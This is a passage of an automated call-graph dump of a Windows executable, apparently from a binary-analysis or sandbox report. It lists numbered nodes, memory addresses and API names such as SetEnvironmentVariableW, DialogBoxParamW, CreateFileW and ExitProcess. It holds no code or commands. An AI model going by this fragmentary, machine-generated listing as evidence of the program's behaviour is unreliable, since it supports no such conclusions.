26867->26874 26868 7ff669ab1aa3 26869 7ff669ab1ac9 26868->26869 26871 7ff669aa3cac 33 API calls 26868->26871 26872 7ff669ad1d90 _handle_error 8 API calls 26869->26872 26870 7ff669ab1a85 SetFileTime 26870->26868 26871->26869 26875 7ff669ab1adc 26872->26875 26873->26868 26873->26870 26874->26873 26876 7ff669ab1af7 26874->26876 26875->26581 26879 7ff669aaaf34 96 API calls 2 library calls 26875->26879 26877 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26876->26877 26878 7ff669ab1afc 26877->26878 26879->26581 26881 7ff669ab1ca6 26880->26881 26882 7ff669ab1cad 26880->26882 26881->26585 26882->26881 26884 7ff669ab1710 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26882->26884 26901 7ff669aaaff4 96 API calls _com_raise_error 26882->26901 26884->26882 26886 7ff669ab1f7d 26885->26886 26887 7ff669ab1f99 26885->26887 26888 7ff669aa3fdc 26886->26888 26902 7ff669aab118 96 API calls _com_raise_error 26886->26902 26887->26888 26890 7ff669ab1fb1 SetFilePointer 26887->26890 26888->26615 26890->26888 26891 7ff669ab1fce GetLastError 26890->26891 26891->26888 26892 7ff669ab1fd8 26891->26892 26892->26888 26903 7ff669aab118 96 API calls _com_raise_error 26892->26903 26904 7ff669ab1b3c 26894->26904 26897 7ff669aa40b7 26897->26594 26897->26607 26899->26596 26900->26600 26905 7ff669ab1b4a _snwprintf 26904->26905 26907 7ff669ab1c45 SetFilePointer 26905->26907 26910 7ff669ab1b76 26905->26910 26906 7ff669ad1d90 _handle_error 8 API calls 26908 7ff669ab1bd9 26906->26908 26909 7ff669ab1c6d GetLastError 26907->26909 26907->26910 26908->26897 26911 7ff669aab118 96 API calls _com_raise_error 26908->26911 26909->26910 26910->26906 26913 7ff669aa3ea6 26912->26913 26914 7ff669aa3eaa 26912->26914 26913->26618 26913->26623 26918 7ff669aa3da4 26914->26918 26917 7ff669ab1e50 98 API calls 26917->26913 26919 7ff669aa3dc5 26918->26919 26920 7ff669aa3dfd 26918->26920 26921 7ff669aa6754 116 API calls 26919->26921 26928 7ff669aa6bd0 26920->26928 26926 7ff669aa3de5 26921->26926 26926->26917 26932 7ff669aa6bf3 26928->26932 26929 7ff669aa6754 116 API calls 26929->26932 26930 7ff669aa3e24 26930->26926 26933 7ff669aa43ec 26930->26933 26932->26929 26932->26930 26957 7ff669abe174 26932->26957 26965 7ff669aa67c0 26933->26965 26935 7ff669aa4433 26936 7ff669aa4471 26935->26936 26937 7ff669aa4482 26935->26937 26955 7ff669aa4437 26935->26955 26997 7ff669ac0344 33 API calls 26936->26997 26943 7ff669aa448b 26937->26943 26948 7ff669aa44d4 26937->26948 26938 7ff669ad1d90 _handle_error 8 API calls 26942 7ff669aa3e34 26938->26942 26939 7ff669aa459e 26944 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26939->26944 26940 7ff669aa4575 26940->26938 26942->26926 26956 7ff669aa32fc 79 API calls 2 library calls 26942->26956 26998 7ff669ac026c 33 API calls 26943->26998 26946 7ff669aa45a3 26944->26946 26950 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 26946->26950 26947 7ff669aa4498 26951 7ff669aa1fa8 31 API calls 26947->26951 26954 7ff669aa44a8 BuildCatchObjectHelperInternal 26947->26954 26999 7ff669ac00ec 34 API calls _invalid_parameter_noinfo_noreturn 26948->26999 26949 7ff669aa1fa8 31 API calls 26949->26955 26953 7ff669aa45a9 26950->26953 26951->26954 26954->26949 26955->26939 26955->26940 26955->26946 26956->26926 26958 7ff669abe17d 26957->26958 26961 7ff669abe197 26958->26961 26963 7ff669aaadc8 RtlPcToFileHeader RaiseException _com_raise_error 26958->26963 26960 7ff669abe1b1 SetThreadExecutionState 26961->26960 26964 7ff669aaadc8 RtlPcToFileHeader RaiseException _com_raise_error 26961->26964 26963->26961 26964->26960 26966 7ff669aa67da _snwprintf 26965->26966 26967 7ff669aa6826 26966->26967 26968 7ff669aa6806 26966->26968 26969 7ff669aa6a8f 26967->26969 26974 7ff669aa6851 26967->26974 27036 7ff669aa32fc 79 API calls 2 library calls 26968->27036 27065 7ff669aa32fc 79 API calls 2 library calls 26969->27065 26972 7ff669aa6812 26973 7ff669ad1d90 _handle_error 8 API calls 26972->26973 26975 7ff669aa6aaf 26973->26975 26974->26972 27000 7ff669ac173c 26974->27000 26975->26935 26978 7ff669aa68c8 26979 7ff669aa696d 26978->26979 26996 7ff669aa68be 26978->26996 27042 7ff669ab7bb8 106 API calls 26978->27042 27009 7ff669ab3ac0 26979->27009 26980 7ff669aa68b0 27037 7ff669aa32fc 79 API calls 2 library calls 26980->27037 26981 7ff669aa68c3 26981->26978 27038 7ff669aa4b44 26981->27038 26987 7ff669aa698c 26988 7ff669aa69fe 26987->26988 26989 7ff669aa6a0c 26987->26989 27013 7ff669ab0ba0 26988->27013 27043 7ff669ac16c8 26989->27043 26992 7ff669aa6a0a 27063 7ff669ab3a60 8 API calls _handle_error 26992->27063 26994 7ff669aa6a3f 26994->26996 27064 7ff669aa4df4 79 API calls 2 library calls 26994->27064 27028 7ff669ac0f90 26996->27028 26997->26955 26998->26947 26999->26955 27001 7ff669ac1863 std::bad_alloc::bad_alloc 27000->27001 27003 7ff669ac177f std::bad_alloc::bad_alloc 27000->27003 27066 7ff669ad3040 RtlPcToFileHeader RaiseException 27001->27066 27005 7ff669aa689b 27003->27005 27006 7ff669ac17d5 std::bad_alloc::bad_alloc 27003->27006 27067 7ff669ad3040 RtlPcToFileHeader RaiseException 27003->27067 27005->26978 27005->26980 27005->26981 27006->27005 27068 7ff669ad3040 RtlPcToFileHeader RaiseException 27006->27068 27008 7ff669ac18b5 27010 7ff669ab3ae0 27009->27010 27012 7ff669ab3aea 27009->27012 27011 7ff669ad1c40 4 API calls 27010->27011 27011->27012 27012->26987 27014 7ff669ab0bca __scrt_get_show_window_mode 27013->27014 27069 7ff669ab7c98 27014->27069 27017 7ff669ab0bfe 27018 7ff669ab0c3c 27017->27018 27020 7ff669ab7c98 130 API calls 27017->27020 27079 7ff669ab7e9c 27017->27079 27020->27017 27029 7ff669ac0fbd 27028->27029 27031 7ff669ac0fdc 27029->27031 27085 7ff669abe2b0 27029->27085 27035 7ff669ac1175 27031->27035 27092 7ff669ab9c08 31 API calls _invalid_parameter_noinfo_noreturn 27031->27092 27032 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27033 7ff669ac1266 27032->27033 27035->27032 27036->26972 27037->26996 27039 7ff669aa4b71 27038->27039 27041 7ff669aa4b6b __scrt_get_show_window_mode 27038->27041 27039->27041 27093 7ff669aa4bb4 33 API calls 2 library calls 27039->27093 27041->26978 27042->26979 27044 7ff669ac16d1 27043->27044 27045 7ff669ac1705 27044->27045 27046 7ff669ac16fd 27044->27046 27047 7ff669ac16f1 27044->27047 27045->26992 27126 7ff669ac31b4 135 API calls 27046->27126 27094 7ff669ac18b8 27047->27094 27056 7ff669ac3fdb BuildCatchObjectHelperInternal 27063->26994 27064->26996 27065->26972 27066->27003 27067->27006 27068->27008 27071 7ff669ab7e1d 27069->27071 27076 7ff669ab7ce1 BuildCatchObjectHelperInternal 27069->27076 27070 7ff669ab7e6a 27072 7ff669abe174 SetThreadExecutionState RtlPcToFileHeader RaiseException 27070->27072 27071->27070 27073 7ff669aa9cb4 8 API calls 27071->27073 27074 7ff669ab7e6f 27072->27074 27073->27070 27074->27017 27075 7ff669ac59cc 121 API calls 27075->27076 27076->27071 27076->27074 27076->27075 27077 7ff669ab3be8 105 API calls 27076->27077 27078 7ff669ab1c80 101 API calls 27076->27078 27077->27076 27078->27076 27086 7ff669abe638 100 API calls 27085->27086 27087 7ff669abe2c7 ReleaseSemaphore 27086->27087 27088 7ff669abe2ec 27087->27088 27089 7ff669abe30b DeleteCriticalSection CloseHandle CloseHandle 27087->27089 27090 7ff669abe3c4 98 API calls 27088->27090 27091 7ff669abe2f6 CloseHandle 27090->27091 27091->27088 27091->27089 27092->27035 27096 7ff669ac18d4 __scrt_get_show_window_mode 27094->27096 27095 7ff669ac19c6 27095->27056 27096->27095 27097 7ff669ad1f10 33 API calls 27096->27097 27098 7ff669ac1961 __scrt_get_show_window_mode 27096->27098 27097->27098 27098->27095 27099 7ff669aaaea8 79 API calls 27098->27099 27099->27098 27126->27045 27131 7ff669ab7ad2 27130->27131 27132 7ff669ab7ae2 27130->27132 27137 7ff669ab17f0 27131->27137 27132->26629 27135 7ff669ad1d90 _handle_error 8 API calls 27134->27135 27136 7ff669aaec8e 27135->27136 27136->26511 27136->26824 27138 7ff669ab180f 27137->27138 27141 7ff669ab1e50 98 API calls 27138->27141 27139 7ff669ab1828 27142 7ff669ab1f60 98 API calls 27139->27142 27140 7ff669ab1838 27140->27132 27141->27139 27142->27140 27144 7ff669aa5bb3 27143->27144 27146 7ff669aa5bed 27144->27146 27153 7ff669aa5c00 27144->27153 27169 7ff669aa5d79 27144->27169 27233 7ff669aa32fc 79 API calls 2 library calls 27146->27233 27148 7ff669aa5e7e 27240 7ff669aa6d2c 79 API calls 27148->27240 27150 7ff669aa5c8d 27235 7ff669aa6acc 79 API calls 27150->27235 27151 7ff669aa670a 27152 7ff669ad1d90 _handle_error 8 API calls 27151->27152 27155 7ff669aa671e 27152->27155 27153->27148 27153->27150 27234 7ff669aa6c98 33 API calls BuildCatchObjectHelperInternal 27153->27234 27155->26637 27157 7ff669aa673f 27159 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27157->27159 27158 7ff669aa66ce 27217 7ff669aa5bfb 27158->27217 27253 7ff669aa5124 79 API calls 27158->27253 27161 7ff669aa6744 27159->27161 27160 7ff669aa5e78 27160->27148 27160->27158 27165 7ff669ab7840 101 API calls 27160->27165 27164 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27161->27164 27166 7ff669aa674a 27164->27166 27167 7ff669aa5ef0 27165->27167 27168 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27166->27168 27167->27148 27176 7ff669aa5ef8 27167->27176 27170 7ff669aa6750 27168->27170 27223 7ff669ab7840 27169->27223 27186 7ff669aa6766 27170->27186 27221 7ff669ab1f60 98 API calls 27170->27221 27171 7ff669aa5de2 27239 7ff669aa4df4 79 API calls 2 library calls 27171->27239 27174 7ff669aa6777 27177 7ff669aa5b70 116 API calls 27174->27177 27174->27186 27175 7ff669aa5ca6 27175->27169 27175->27171 27236 7ff669aa4df4 79 API calls 2 library calls 27175->27236 27237 7ff669aa6acc 79 API calls 27175->27237 27238 7ff669aa9ce0 106 API calls _handle_error 27175->27238 27178 7ff669aa5f93 27176->27178 27241 7ff669aa5124 79 API calls 27176->27241 27179 7ff669aa6791 27177->27179 27178->27158 27184 7ff669aa5fba 27178->27184 27179->27186 27188 7ff669aa6612 27184->27188 27186->26637 27217->27151 27217->27157 27217->27166 27221->27174 27224 7ff669ab7864 27223->27224 27225 7ff669ab78ea 27223->27225 27227 7ff669aa4b44 33 API calls 27224->27227 27230 7ff669ab78cc 27224->27230 27226 7ff669aa4b44 33 API calls 27225->27226 27225->27230 27228 7ff669ab7903 27226->27228 27229 7ff669ab789d 27227->27229 27232 7ff669ab1c80 101 API calls 27228->27232 27255 7ff669aa9cb4 27229->27255 27230->27160 27232->27230 27233->27217 27235->27175 27236->27175 27237->27175 27238->27175 27239->27217 27240->27217 27256 7ff669aa9cc5 27255->27256 27257 7ff669aa9cda 27256->27257 27259 7ff669aba868 8 API calls 2 library calls 27256->27259 27257->27230 27259->27257 27267 7ff669aa9713 27260->27267 27261 7ff669ad1d90 _handle_error 8 API calls 27262 7ff669aa9802 27261->27262 27262->26653 27265 7ff669aa9747 27265->27261 27266 7ff669aa97b5 27266->27265 27268 7ff669aa9842 27266->27268 27267->27265 27267->27266 27269 7ff669aa9813 27267->27269 27393 7ff669ab4620 27267->27393 27411 7ff669abd384 27267->27411 27270 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27268->27270 27271 7ff669aa9824 27269->27271 27415 7ff669abd26c CompareStringW 27269->27415 27272 7ff669aa9847 27270->27272 27271->27266 27274 7ff669aa3cac 33 API calls 27271->27274 27274->27266 27281 7ff669ab5273 27275->27281 27276 7ff669ab54d8 27277 7ff669ad1d90 _handle_error 8 API calls 27276->27277 27279 7ff669aaefe5 27277->27279 27279->26656 27342 7ff669ab6f4c 47 API calls 2 library calls 27279->27342 27280 7ff669aa12c0 33 API calls 27283 7ff669ab5467 27280->27283 27281->27276 27281->27280 27288 7ff669ab5502 27281->27288 27282 7ff669ab5508 27284 7ff669aa1fa8 31 API calls 27283->27284 27285 7ff669ab5479 BuildCatchObjectHelperInternal 27283->27285 27284->27285 27285->27276 27286 7ff669ab54fd 27285->27286 27419 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 27288->27419 27341->26641 27391->26697 27392->26697 27394 7ff669ab4660 27393->27394 27398 7ff669ab469e __vcrt_InitializeCriticalSectionEx 27394->27398 27400 7ff669ab46c5 __vcrt_InitializeCriticalSectionEx 27394->27400 27416 7ff669ac0b08 CompareStringW 27394->27416 27395 7ff669ad1d90 _handle_error 8 API calls 27396 7ff669ab4892 27395->27396 27396->27267 27398->27400 27401 7ff669ab470e __vcrt_InitializeCriticalSectionEx 27398->27401 27417 7ff669ac0b08 CompareStringW 27398->27417 27400->27395 27401->27400 27402 7ff669aa12c0 33 API calls 27401->27402 27408 7ff669ab47c8 27401->27408 27403 7ff669ab47b5 27402->27403 27405 7ff669ab65d0 8 API calls 27403->27405 27404 7ff669ab4818 27404->27400 27418 7ff669ac0b08 CompareStringW 27404->27418 27405->27408 27406 7ff669ab48aa 27409 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27406->27409 27408->27404 27408->27406 27410 7ff669ab48af 27409->27410 27412 7ff669abd397 27411->27412 27413 7ff669abd3a8 27412->27413 27414 7ff669aa20c0 33 API calls 27412->27414 27413->27267 27414->27413 27415->27271 27416->27398 27417->27401 27418->27400 27419->27282 27433->26812 27434->26817 27436 7ff669ab79ff 27435->27436 27442 7ff669ab3970 27436->27442 27438 7ff669ab7a95 27439 7ff669ab3970 105 API calls 27438->27439 27440 7ff669ab7aa1 27439->27440 27441->26810 27443 7ff669ab3986 27442->27443 27445 7ff669ab398e 27442->27445 27444 7ff669abe2b0 105 API calls 27443->27444 27444->27445 27445->27438 27447 7ff669ac7d70 4 API calls 27446->27447 27448 7ff669ac7d4e 27447->27448 27449 7ff669ac7d5d 27448->27449 27458 7ff669ac7da8 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27448->27458 27449->25776 27449->25777 27451->25782 27452->25788 27454 7ff669ac7d82 27453->27454 27456 7ff669ac7d87 27453->27456 27459 7ff669ac7e34 GetDC 27454->27459 27456->25788 27457->25791 27458->27449 27460 7ff669ac7e7d 27459->27460 27461 7ff669ac7e4a GetDeviceCaps GetDeviceCaps ReleaseDC 27459->27461 27460->27456 27461->27460 27465 7ff669aca664 GetMessageW 27464->27465 27466 7ff669aca6a8 GetDlgItem 27464->27466 27467 7ff669aca692 TranslateMessage DispatchMessageW 27465->27467 27468 7ff669aca683 IsDialogMessageW 27465->27468 27466->25822 27466->25823 27467->27466 27468->27466 27468->27467 27485 7ff669abccf8 27469->27485 27473 7ff669abd10f swprintf 27474 7ff669ad9494 swprintf 46 API calls 27473->27474 27481 7ff669abd19e 27473->27481 27499 7ff669aa98c0 33 API calls 27473->27499 27474->27473 27475 7ff669abd1c7 27477 7ff669abd23e 27475->27477 27480 7ff669abd266 27475->27480 27478 7ff669ad1d90 _handle_error 8 API calls 27477->27478 27479 7ff669abd252 27478->27479 27479->25393 27482 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27480->27482 27481->27475 27500 7ff669aa98c0 33 API calls 27481->27500 27483 7ff669abd26b 27482->27483 27486 7ff669abce89 27485->27486 27488 7ff669abcd2a 27485->27488 27489 7ff669abc784 27486->27489 27487 7ff669aa1754 33 API calls 27487->27488 27488->27486 27488->27487 27490 7ff669abc7ba 27489->27490 27498 7ff669abc87f 27489->27498 27493 7ff669abc7f2 27490->27493 27494 7ff669abc87a 27490->27494 27495 7ff669abc7c2 27490->27495 27493->27495 27497 7ff669ad1c40 4 API calls 27493->27497 27501 7ff669aa1f88 RtlPcToFileHeader RaiseException _com_raise_error std::bad_alloc::bad_alloc 27494->27501 27495->27473 27497->27495 27502 7ff669aa200c 33 API calls std::_Xinvalid_argument 27498->27502 27499->27473 27500->27475 27503->25856 27504->25889 27506->25894 27508 7ff669acfc30 27509 7ff669acfc74 27508->27509 27510 7ff669acfcec 27508->27510 27511 7ff669aba008 58 API calls 27509->27511 27512 7ff669aba008 58 API calls 27510->27512 27513 7ff669acfc88 27511->27513 27514 7ff669acfd00 27512->27514 27515 7ff669abd2bc 48 API calls 27513->27515 27516 7ff669abd2bc 48 API calls 27514->27516 27520 7ff669acfc97 BuildCatchObjectHelperInternal 27515->27520 27516->27520 27517 7ff669aa1fa8 31 API calls 27518 7ff669acfd98 27517->27518 27521 7ff669aa2678 SetDlgItemTextW 27518->27521 27519 7ff669acfe23 27523 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27519->27523 27520->27517 27520->27519 27532 7ff669acfe1d 27520->27532 27524 7ff669acfdad SetWindowTextW 27521->27524 27522 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27522->27519 27525 7ff669acfe29 27523->27525 27526 7ff669acfdc6 27524->27526 27527 7ff669acfdf3 27524->27527 27526->27527 27530 7ff669acfe18 27526->27530 27528 7ff669ad1d90 _handle_error 8 API calls 27527->27528 27529 7ff669acfe06 27528->27529 27531 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27530->27531 27531->27532 27532->27522 27539 7ff669ad268c 27564 7ff669ad2270 27539->27564 27542 7ff669ad27d8 27668 7ff669ad2bb0 7 API calls 2 library calls 27542->27668 27543 7ff669ad26a8 __scrt_acquire_startup_lock 27545 7ff669ad27e2 27543->27545 27547 7ff669ad26c6 27543->27547 27669 7ff669ad2bb0 7 API calls 2 library calls 27545->27669 27548 7ff669ad26eb 27547->27548 27551 7ff669ad2708 __scrt_release_startup_lock 27547->27551 27572 7ff669adbcd0 27547->27572 27549 7ff669ad27ed abort 27552 7ff669ad2771 27551->27552 27665 7ff669adaf90 35 API calls __GSHandlerCheck_EH 27551->27665 27576 7ff669ad2cf8 27552->27576 27554 7ff669ad2776 27579 7ff669adbc60 27554->27579 27565 7ff669ad2278 27564->27565 27566 7ff669ad2284 __scrt_dllmain_crt_thread_attach 27565->27566 27567 7ff669ad2291 27566->27567 27568 7ff669ad228d 27566->27568 27670 7ff669adbb90 27567->27670 27568->27542 27568->27543 27573 7ff669adbd2b 27572->27573 27574 7ff669adbd0c 27572->27574 27573->27551 27574->27573 27687 7ff669aa1140 27574->27687 27693 7ff669ae5770 27576->27693 27695 7ff669adf670 27579->27695 27581 7ff669adbc6f 27583 7ff669ad277e 27581->27583 27699 7ff669adfa00 35 API calls swprintf 27581->27699 27584 7ff669acfff0 27583->27584 27701 7ff669abd7f8 27584->27701 27587 7ff669ab55f8 35 API calls 27588 7ff669ad005b 27587->27588 27775 7ff669ac8cec 27588->27775 27590 7ff669ad0065 __scrt_get_show_window_mode 27780 7ff669ac92a8 27590->27780 27592 7ff669ad0697 27594 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27592->27594 27593 7ff669ad022c GetCommandLineW 27597 7ff669ad023e 27593->27597 27598 7ff669ad0404 27593->27598 27596 7ff669ad069d 27594->27596 27595 7ff669ad00f2 27595->27592 27595->27593 27601 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27596->27601 27602 7ff669aa12c0 33 API calls 27597->27602 27599 7ff669ab5758 34 API calls 27598->27599 27600 7ff669ad0412 27599->27600 27605 7ff669aa1fa8 31 API calls 27600->27605 27608 7ff669ad0429 BuildCatchObjectHelperInternal 27600->27608 27603 7ff669ad06a3 27601->27603 27604 7ff669ad0264 27602->27604 27610 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27603->27610 27790 7ff669acc58c 27604->27790 27605->27608 27606 7ff669aa1fa8 31 API calls 27609 7ff669ad0452 SetEnvironmentVariableW GetLocalTime 27606->27609 27608->27606 27612 7ff669ab9d6c swprintf 46 API calls 27609->27612 27618 7ff669ad06a9 27610->27618 27611 7ff669ad026d 27611->27596 27615 7ff669ad039e 27611->27615 27616 7ff669ad02b6 27611->27616 27613 7ff669ad04cf SetEnvironmentVariableW GetModuleHandleW LoadIconW 27612->27613 27823 7ff669aca844 LoadBitmapW 27613->27823 27614 7ff669ad1350 _com_raise_error 14 API calls 27614->27618 27622 7ff669aa12c0 33 API calls 27615->27622 27854 7ff669aa2830 33 API calls 27616->27854 27618->27614 27621 7ff669ad052c 27847 7ff669ac606c 27621->27847 27625 7ff669ad03c4 27622->27625 27810 7ff669acf540 27625->27810 27626 7ff669ad02e3 27855 7ff669aa2d94 39 API calls _handle_error 27626->27855 27630 7ff669ad02f5 27633 7ff669ad033c 27630->27633 27856 7ff669ac99a8 33 API calls 2 library calls 27630->27856 27631 7ff669ac606c 4 API calls 27634 7ff669ad053e DialogBoxParamW 27631->27634 27636 7ff669aa1fa8 31 API calls 27633->27636 27645 7ff669ad058a 27634->27645 27638 7ff669ad0350 27636->27638 27637 7ff669ad0309 27640 7ff669acf540 35 API calls 27637->27640 27638->27603 27642 7ff669ad0381 27638->27642 27639 7ff669ad0692 27641 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27639->27641 27644 7ff669ad0315 27640->27644 27641->27592 27859 7ff669aa2c2c DisconnectNamedPipe CloseHandle 27642->27859 27857 7ff669abb2fc 99 API calls 27644->27857 27648 7ff669ad05a3 27645->27648 27649 7ff669ad059d Sleep 27645->27649 27646 7ff669ad039c 27646->27598 27651 7ff669ad05b1 27648->27651 27860 7ff669ac975c 49 API calls 2 library calls 27648->27860 27649->27648 27650 7ff669ad032d 27858 7ff669abb444 99 API calls 27650->27858 27654 7ff669ad05bd DeleteObject 27651->27654 27655 7ff669ad05dc 27654->27655 27656 7ff669ad05d6 DeleteObject 27654->27656 27657 7ff669ad0623 27655->27657 27658 7ff669ad0611 27655->27658 27656->27655 27850 7ff669ac8d64 27657->27850 27861 7ff669acf658 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 27658->27861 27661 7ff669ad0616 CloseHandle 27661->27657 27665->27552 27668->27545 27669->27549 27671 7ff669adfc8c 27670->27671 27672 7ff669ad2296 27671->27672 27675 7ff669addb40 27671->27675 27672->27568 27674 7ff669ad4030 7 API calls 2 library calls 27672->27674 27674->27568 27686 7ff669ade2d8 EnterCriticalSection 27675->27686 27688 7ff669aa8cfc 35 API calls 27687->27688 27689 7ff669aa1150 27688->27689 27692 7ff669ad2420 34 API calls 27689->27692 27691 7ff669ad2465 27691->27574 27692->27691 27694 7ff669ad2d0f GetStartupInfoW 27693->27694 27694->27554 27696 7ff669adf689 27695->27696 27697 7ff669adf67d 27695->27697 27696->27581 27700 7ff669adf4b0 48 API calls 4 library calls 27697->27700 27699->27581 27700->27696 27862 7ff669ad1ec0 27701->27862 27704 7ff669abd84e GetProcAddress 27706 7ff669abd863 27704->27706 27707 7ff669abd87b GetProcAddress 27704->27707 27705 7ff669abd8a3 27708 7ff669abdd29 27705->27708 27869 7ff669ada6c8 39 API calls 2 library calls 27705->27869 27706->27707 27707->27705 27710 7ff669abd890 27707->27710 27709 7ff669ab5758 34 API calls 27708->27709 27713 7ff669abdd35 27709->27713 27710->27705 27712 7ff669abdba2 27712->27708 27714 7ff669abdbac 27712->27714 27715 7ff669ab70b0 47 API calls 27713->27715 27716 7ff669ab5758 34 API calls 27714->27716 27732 7ff669abdd49 27715->27732 27717 7ff669abdbb8 CreateFileW 27716->27717 27718 7ff669abdc01 SetFilePointer 27717->27718 27719 7ff669abdd13 CloseHandle 27717->27719 27718->27719 27721 7ff669abdc1a ReadFile 27718->27721 27722 7ff669aa1fa8 31 API calls 27719->27722 27721->27719 27723 7ff669abdc42 27721->27723 27722->27708 27724 7ff669abe0b2 27723->27724 27725 7ff669abdc56 27723->27725 27876 7ff669ad2094 8 API calls 27724->27876 27730 7ff669aa12c0 33 API calls 27725->27730 27727 7ff669abdd6e CompareStringW 27727->27732 27728 7ff669aa12c0 33 API calls 27728->27732 27729 7ff669abe0b7 27744 7ff669abdc96 27730->27744 27731 7ff669ab7334 47 API calls 27731->27732 27732->27727 27732->27728 27732->27731 27733 7ff669aa1fa8 31 API calls 27732->27733 27740 7ff669ab2680 51 API calls 27732->27740 27764 7ff669abde11 27732->27764 27864 7ff669ab4518 27732->27864 27733->27732 27735 7ff669abe06e 27739 7ff669aa1fa8 31 API calls 27735->27739 27736 7ff669abdea2 27874 7ff669ab7170 47 API calls 27736->27874 27737 7ff669abdcfa 27741 7ff669aa1fa8 31 API calls 27737->27741 27743 7ff669abe07a 27739->27743 27740->27732 27745 7ff669abdd06 27741->27745 27742 7ff669abdeae 27746 7ff669ab4518 9 API calls 27742->27746 27748 7ff669aa1fa8 31 API calls 27743->27748 27744->27737 27870 7ff669abc968 27744->27870 27749 7ff669aa1fa8 31 API calls 27745->27749 27750 7ff669abdeb3 27746->27750 27747 7ff669aa12c0 33 API calls 27747->27764 27751 7ff669abe087 27748->27751 27749->27719 27752 7ff669abdf8d 27750->27752 27759 7ff669abdebe 27750->27759 27754 7ff669ad1d90 _handle_error 8 API calls 27751->27754 27755 7ff669abd2bc 48 API calls 27752->27755 27753 7ff669ab7334 47 API calls 27753->27764 27756 7ff669abe096 GetCurrentProcess SetUserObjectInformationW 27754->27756 27757 7ff669abdfee AllocConsole 27755->27757 27756->27587 27760 7ff669abdff8 GetCurrentProcessId AttachConsole 27757->27760 27774 7ff669abdf57 27757->27774 27758 7ff669aa1fa8 31 API calls 27758->27764 27763 7ff669aba008 58 API calls 27759->27763 27761 7ff669abe012 27760->27761 27768 7ff669abe021 GetStdHandle WriteConsoleW Sleep FreeConsole 27761->27768 27762 7ff669ab2680 51 API calls 27762->27764 27766 7ff669abdf18 27763->27766 27764->27747 27764->27753 27764->27758 27764->27762 27767 7ff669abde94 27764->27767 27765 7ff669abe065 ExitProcess 27769 7ff669abd2bc 48 API calls 27766->27769 27767->27735 27767->27736 27768->27774 27770 7ff669abdf3d 27769->27770 27771 7ff669aba008 58 API calls 27770->27771 27772 7ff669abdf48 27771->27772 27875 7ff669abd440 33 API calls 27772->27875 27774->27765 27776 7ff669abd5a4 27775->27776 27777 7ff669ac8d01 OleInitialize 27776->27777 27778 7ff669ac8d27 27777->27778 27779 7ff669ac8d4d SHGetMalloc 27778->27779 27779->27590 27781 7ff669ac92dd 27780->27781 27788 7ff669ac92e2 BuildCatchObjectHelperInternal 27780->27788 27782 7ff669aa1fa8 31 API calls 27781->27782 27782->27788 27783 7ff669ac9340 BuildCatchObjectHelperInternal 27787 7ff669aa1fa8 31 API calls 27783->27787 27789 7ff669ac936f BuildCatchObjectHelperInternal 27783->27789 27784 7ff669ac9311 BuildCatchObjectHelperInternal 27784->27783 27786 7ff669aa1fa8 31 API calls 27784->27786 27785 7ff669aa1fa8 31 API calls 27785->27784 27786->27783 27787->27789 27788->27784 27788->27785 27789->27595 27791 7ff669abc968 33 API calls 27790->27791 27808 7ff669acc5e8 BuildCatchObjectHelperInternal 27791->27808 27792 7ff669acc8aa 27794 7ff669acc8dc 27792->27794 27804 7ff669acc910 27792->27804 27793 7ff669ad1d90 _handle_error 8 API calls 27795 7ff669acc8ed 27793->27795 27794->27793 27795->27611 27796 7ff669abc968 33 API calls 27796->27808 27797 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27798 7ff669acc916 27797->27798 27879 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 27798->27879 27800 7ff669acc90b 27878 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 27800->27878 27801 7ff669acc91c 27880 7ff669aa6ddc 47 API calls BuildCatchObjectHelperInternal 27801->27880 27804->27797 27806 7ff669acc922 27807 7ff669aa12c0 33 API calls 27807->27808 27808->27792 27808->27796 27808->27798 27808->27800 27808->27801 27808->27804 27808->27807 27809 7ff669aa1fa8 31 API calls 27808->27809 27877 7ff669abb444 99 API calls 27808->27877 27809->27808 27811 7ff669acf570 SetEnvironmentVariableW 27810->27811 27812 7ff669acf56d 27810->27812 27813 7ff669abc968 33 API calls 27811->27813 27812->27811 27820 7ff669acf5ab 27813->27820 27814 7ff669ad1d90 _handle_error 8 API calls 27818 7ff669acf642 27814->27818 27815 7ff669acf631 27815->27814 27816 7ff669acf5fa 27816->27815 27817 7ff669acf652 27816->27817 27819 7ff669ad6854 _invalid_parameter_noinfo_noreturn 31 API calls 27817->27819 27818->27598 27818->27639 27821 7ff669acf657 27819->27821 27820->27816 27822 7ff669acf5e4 SetEnvironmentVariableW 27820->27822 27822->27816 27824 7ff669aca86b 27823->27824 27825 7ff669aca873 27823->27825 27881 7ff669ac7ec8 FindResourceW 27824->27881 27827 7ff669aca87b GetObjectW 27825->27827 27828 7ff669aca890 27825->27828 27827->27828 27829 7ff669ac7d40 4 API calls 27828->27829 27830 7ff669aca8a5 27829->27830 27831 7ff669aca8fa 27830->27831 27832 7ff669aca8ca 27830->27832 27833 7ff669ac7ec8 11 API calls 27830->27833 27842 7ff669ab8ae0 27831->27842 27896 7ff669ac7da8 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 27832->27896 27835 7ff669aca8b6 27833->27835 27835->27832 27837 7ff669aca8be DeleteObject 27835->27837 27836 7ff669aca8d3 27838 7ff669ac7d70 4 API calls 27836->27838 27837->27832 